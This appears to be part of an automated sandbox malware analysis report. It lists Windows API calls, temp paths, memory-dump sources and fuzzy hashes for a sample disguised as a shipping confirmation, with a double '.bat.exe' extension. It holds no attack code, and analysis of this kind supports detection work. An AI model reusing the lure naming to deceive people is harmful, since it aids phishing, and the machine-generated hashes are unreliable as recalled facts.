                                                                            • Source File: 00000000.00000002.2155284752.00000000733B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 733B0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2155172212.00000000733B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2155846609.00000000733B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2155909402.00000000733B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_733b0000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                            • String ID:
                                                                            • API String ID: 1148316912-0
                                                                            • Opcode ID: d9a4b4cfa391c7dcbf47637aa2b1563f4936c18b2394dd85c8e1fbb001d628a9
                                                                            • Instruction ID: 53d98359a2b6c808564b7bb78ce009b1a9f62ad34e014368c96fa34191fbd8c9
                                                                            • Opcode Fuzzy Hash: d9a4b4cfa391c7dcbf47637aa2b1563f4936c18b2394dd85c8e1fbb001d628a9
                                                                            • Instruction Fuzzy Hash: 7AF01C732061387BE63026A79C4CDABBE9CEF8B2F5B210215F62C9229096654C01D7F5
                                                                            APIs
                                                                            • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,?,00406070,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe"), ref: 0040600A
                                                                            • CharNextW.USER32(00000000), ref: 0040600F
                                                                            • CharNextW.USER32(00000000), ref: 00406027
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\nsx45AB.tmp, xrefs: 00405FFD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: CharNext
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsx45AB.tmp
                                                                            • API String ID: 3213498283-247911329
                                                                            • Opcode ID: fbda1c126528e77f8eb1d19cbf263a4f79599cb979c26f3e0093e3aefe43dd94
                                                                            • Instruction ID: 6b36e5aaf6ec4384ffc5acae3f619c12edb839be27b3f0f06f1fa7befb24a934
                                                                            • Opcode Fuzzy Hash: fbda1c126528e77f8eb1d19cbf263a4f79599cb979c26f3e0093e3aefe43dd94
                                                                            • Instruction Fuzzy Hash: 00F0963198061595DE31F6584C45A7767BCDF55394B02807BE602B71C1D7B888E186DA
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403632,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405F57
                                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403632,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405F61
                                                                            • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405F73
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F51
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 2659869361-3081826266
                                                                            • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                            • Instruction ID: a99b79add3f29df6de165ac7772d062030ca4d7d7db28986cd5f5f8a2b4e36b3
                                                                            • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                            • Instruction Fuzzy Hash: C9D0A731101934AAC211AF548D04CDF639C9F463443414C3BF501B30A1CB7D6D6287FD
                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 733B1171
                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 733B11E3
                                                                            • GlobalFree.KERNEL32 ref: 733B124A
                                                                            • GlobalFree.KERNEL32(?), ref: 733B129B
                                                                            • GlobalFree.KERNEL32(00000000), ref: 733B12B1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2155284752.00000000733B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 733B0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2155172212.00000000733B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2155846609.00000000733B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2155909402.00000000733B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_733b0000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: Global$Free$Alloc
                                                                            • String ID:
                                                                            • API String ID: 1780285237-0
                                                                            • Opcode ID: 1cc626773547667d69d0166449990c3bbe9dc7509492c36139c5dbd000e6c760
                                                                            • Instruction ID: 44be644d3c8e797c7657e9657bf4d152c3b04a2f7bd14e70f9825993dff2b818
                                                                            • Opcode Fuzzy Hash: 1cc626773547667d69d0166449990c3bbe9dc7509492c36139c5dbd000e6c760
                                                                            • Instruction Fuzzy Hash: 42515AB6D00205DFE721EF69C884B2677BEFB48315B14412AE94ADBA50F73CAD01CB64
                                                                            APIs
                                                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsx45AB.tmp\System.dll), ref: 0040269A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsx45AB.tmp$C:\Users\user\AppData\Local\Temp\nsx45AB.tmp\System.dll
                                                                            • API String ID: 1659193697-1326484755
                                                                            • Opcode ID: 0bc0856152eb1df416620cc5b8216ee98a437742c409cafcdd725fde6fb42ba2
                                                                            • Instruction ID: 3f04c1712215209208acb7642429b7129ba4cba87377fac841ce35f74c6015ca
                                                                            • Opcode Fuzzy Hash: 0bc0856152eb1df416620cc5b8216ee98a437742c409cafcdd725fde6fb42ba2
                                                                            • Instruction Fuzzy Hash: DF110A72A40205BBCB00BBB19E4AA9F76A19F50748F21483FF502F61C1DAFD89D1665E
                                                                            APIs
                                                                            • CloseHandle.KERNEL32(000002E4,C:\Users\user\AppData\Local\Temp\,00403B95,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403C74
                                                                            • CloseHandle.KERNEL32(000002F0,C:\Users\user\AppData\Local\Temp\,00403B95,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403C88
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C67
                                                                            • C:\Users\user\AppData\Local\Temp\nsx45AB.tmp, xrefs: 00403C98
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsx45AB.tmp
                                                                            • API String ID: 2962429428-923701078
                                                                            • Opcode ID: aee73ed6a062803200b229e34675cefdb9ab84dda1d90898f0442dcc956d8ee4
                                                                            • Instruction ID: 8c071fc62b7e332c461b44292a81ac7d95f2e272703a36c0b89becc6b1ca42eb
                                                                            • Opcode Fuzzy Hash: aee73ed6a062803200b229e34675cefdb9ab84dda1d90898f0442dcc956d8ee4
                                                                            • Instruction Fuzzy Hash: C9E04F3140471896D5246F78AE4E9853A185F41335B248326F078F21F0C738995A5AA9
                                                                            APIs
                                                                              • Part of subcall function 00406682: lstrcpynW.KERNEL32(?,?,00000400,004037B7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040668F
                                                                              • Part of subcall function 00405FFC: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,?,00406070,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe"), ref: 0040600A
                                                                              • Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 0040600F
                                                                              • Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 00406027
                                                                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe"), ref: 004060B2
                                                                            • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0), ref: 004060C2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsx45AB.tmp
                                                                            • API String ID: 3248276644-247911329
                                                                            • Opcode ID: 8ac32a27a18f4c2dd493eafaed9bce6c13b36ca5a95e32c2f60d88480e43d1b4
                                                                            • Instruction ID: c6e62d849c1808a59ce2984a64bb42424f7e4e7bb9f9a1371c2689eace45329e
                                                                            • Opcode Fuzzy Hash: 8ac32a27a18f4c2dd493eafaed9bce6c13b36ca5a95e32c2f60d88480e43d1b4
                                                                            • Instruction Fuzzy Hash: 17F04426144E6219D632723A0C05EAF26148F82354B57463FF853B22D1DF3C8D62C17E
                                                                            APIs
                                                                            • IsWindowVisible.USER32(?), ref: 004056AA
                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 004056FB
                                                                              • Part of subcall function 0040464D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040465F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                            • String ID:
                                                                            • API String ID: 3748168415-3916222277
                                                                            • Opcode ID: 566dc257d6ecfccfd9b8870a3abbf6eef49955a94d49fdbfe0e36d929d226f84
                                                                            • Instruction ID: 56d6425d582badedfe6e85af8287ead15e3733fa9de593adb61ce7d3cc062d63
                                                                            • Opcode Fuzzy Hash: 566dc257d6ecfccfd9b8870a3abbf6eef49955a94d49fdbfe0e36d929d226f84
                                                                            • Instruction Fuzzy Hash: 1601B131101608ABDF205F41DE80AAF3A39EB84754F90483BF509761D0D77B8C929E6D
                                                                            APIs
                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00421F28,?,00000800,00000000,?,00421F28,?,?,Call,?,00000000,004067C1,80000002), ref: 00406596
                                                                            • RegCloseKey.ADVAPI32(?), ref: 004065A1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: CloseQueryValue
                                                                            • String ID: Call
                                                                            • API String ID: 3356406503-1824292864
                                                                            • Opcode ID: 45cc12acc3a9c215c07d598151d8e3fd579320fa7e8caec45c805d12e0fab9e6
                                                                            • Instruction ID: 225dfe442f4fc2e839130f584d2f70a73ee2f61c7405cac2e0d59c7fe544a8ff
                                                                            • Opcode Fuzzy Hash: 45cc12acc3a9c215c07d598151d8e3fd579320fa7e8caec45c805d12e0fab9e6
                                                                            • Instruction Fuzzy Hash: 39017172510209FEDF218F55DD05EDB3BE8EB54364F014035FD1592190E738D968DBA4
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00403141,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe,C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe,80000000,00000003), ref: 00405FA3
                                                                            • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00403141,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe,C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe,80000000,00000003), ref: 00405FB3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: CharPrevlstrlen
                                                                            • String ID: C:\Users\user\Desktop
                                                                            • API String ID: 2709904686-224404859
                                                                            • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                            • Instruction ID: 76a3089014cba6cdede5e63107dce03d3cc6699033e3804c636830b34c248568
                                                                            • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                            • Instruction Fuzzy Hash: D1D05EB2401921DAE3126B04DD00D9F63ACEF12300746482AE840E7161D77C5C8186AD
                                                                            APIs
                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E7
                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 004060FF
                                                                            • CharNextA.USER32(00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406110
                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406119
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 190613189-0
                                                                            • Opcode ID: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
                                                                            • Instruction ID: 41d5ee4ea83cc4d308be6584820b02a87ee89e19241337121ce36a8d52a16fb8
                                                                            • Opcode Fuzzy Hash: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
                                                                            • Instruction Fuzzy Hash: 9DF06235504418EFC702DBA9DD00D9EBFA8EF46350B2640B9E841FB211DA74DE11AB99